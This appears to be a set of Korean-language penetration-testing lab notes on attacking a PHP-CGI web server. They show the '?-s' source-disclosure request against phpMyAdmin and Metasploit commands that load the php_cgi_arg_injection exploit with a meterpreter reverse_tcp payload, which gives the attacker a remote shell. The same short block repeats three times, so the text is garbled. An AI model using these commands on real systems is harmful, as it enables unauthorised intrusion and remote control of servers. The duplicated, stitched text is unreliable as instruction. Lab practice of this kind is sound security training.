meta ip/phpMyAdmin/?-s 라고 입력하면 소스코드가 다 보여진다.
메타스플로잇으로 공격을 수행해본다.
use exploit/multi/http/php_cgi_arg_injection
set payload php/meterpreter/reverse_tcp
웹 공격의 경우에는 대부분 이렇게 일반 사용자의 권한을 얻게 된다. 대부분의 웹 서버는 일 반 사용자의 권한으로 실행되기 때문이다.
#php cgi 공격
meta ip/phpMyAdmin/?-s 라고 입력하면 소스코드가 다 보여진다.
use exploit/multi/http/php_cgi_arg_injection
set payload php/meterpreter/reverse_tcp
웹 공격의 경우에는 대부분 이렇게 일반 사용자의 권한을 얻게 된다. 대부분의 웹 서버는 일 반 사용자의 권한으로 실행되기 때문이다.
meta ip/phpMyAdmin/?-s 라고 입력하면 소스코드가 다 보여진다.
use exploit/multi/http/php_cgi_arg_injection
set payload php/meterpreter/reverse_tcp
웹 공격의 경우에는 대부분 이렇게 일반 사용자의 권한을 얻게 된다. 대부분의 웹 서버는 일 반 사용자의 권한으로 실행되기 때문이다.